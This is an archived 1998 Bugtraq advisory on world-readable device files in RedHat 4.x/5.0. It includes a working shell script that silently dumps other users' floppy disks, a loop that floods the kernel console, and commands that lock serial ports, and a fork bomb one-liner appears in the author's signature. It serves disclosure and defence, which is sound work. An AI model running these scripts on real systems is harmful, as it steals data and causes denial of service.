Bugtraq mailing list archives
RedHat 4.x/5.0 /dev permissions
From: lcamtuf () POLBOX COM (Micha? Zalewski)
Date: Wed, 4 Feb 1998 09:45:37 +0100
First one ---------- Any user can read data from (even not mounted) floppy using "cat /dev/fd0H1440". It isn't dangerous itself, but... Any user may write a script, which periodically checks if floppy has been just unmounted, then dumps it's content to a file. Here's a sample 'floppy collector': -- fdumper -- #!/bin/sh DUMP_DEV=/dev/fd0H1440 MOUNT_DEV=/dev/fd0 LABEL=0 DUMPED=1 while:; do sleep 1 if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then if [ "$DUMPED" = "0" ]; then echo "Dumping image #$LABEL..." cat $DUMP_DEV >.fdimage$LABEL let LABEL=LABEL+1 DUMPED=1 fi else DUMPED=0 fi done -- eof -- Also, if there's no floppy in drive, unprivledged user may flood kernel log console (local console by default!!!): [user@host sth]$ while :; do cat /dev/fd0H1440;done & It will generate a lot of kernel messages, which will be logged to /var/log/messages AND to console (default klogd behaviour). Also, every printk(...) (called by fd driver) uses sync() to flush buffers. It will cause abnormal hdd activity. Second one ----------- (not tested with rh 5.0) Ordinary user are allowed to read /dev/ttyS*. Serial ports driver disallows multiple access attempts at the same time, so user may permanently lock choosen port using this command: [user@host user]$ cat /dev/ttyS0 (Ctrl+Z) [user@host user]$ cat /dev/ttyS0 cat: /dev/ttyS0: device is busy Now serial port is in unusable state. That's all? ------------ There are also a lot of other, not-so-common devices, eg. /dev/sequencer, which are world-readable or even world-writable. There's no ANY reason to give ordinary users direct access to hardware devices. It's quite easy (as shown above ;) to obtain an interesting data or cause system failure by reading/writing these devices. Solution... ------------ ls -l /dev/* | grep "r-- " chmod ;) _______________________________________________________________________ Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl] Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch] =------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
Current thread:
- serious security problem in XKB Pavel Kankovsky (Feb 03)
- RedHat 4.x/5.0 /dev permissions Micha? Zalewski (Feb 04)
- serious security problem in XKB--ERRATUM Pavel Kankovsky (Feb 04)
- An old ld-linux.so hole Rafal Wojtczuk (Feb 04)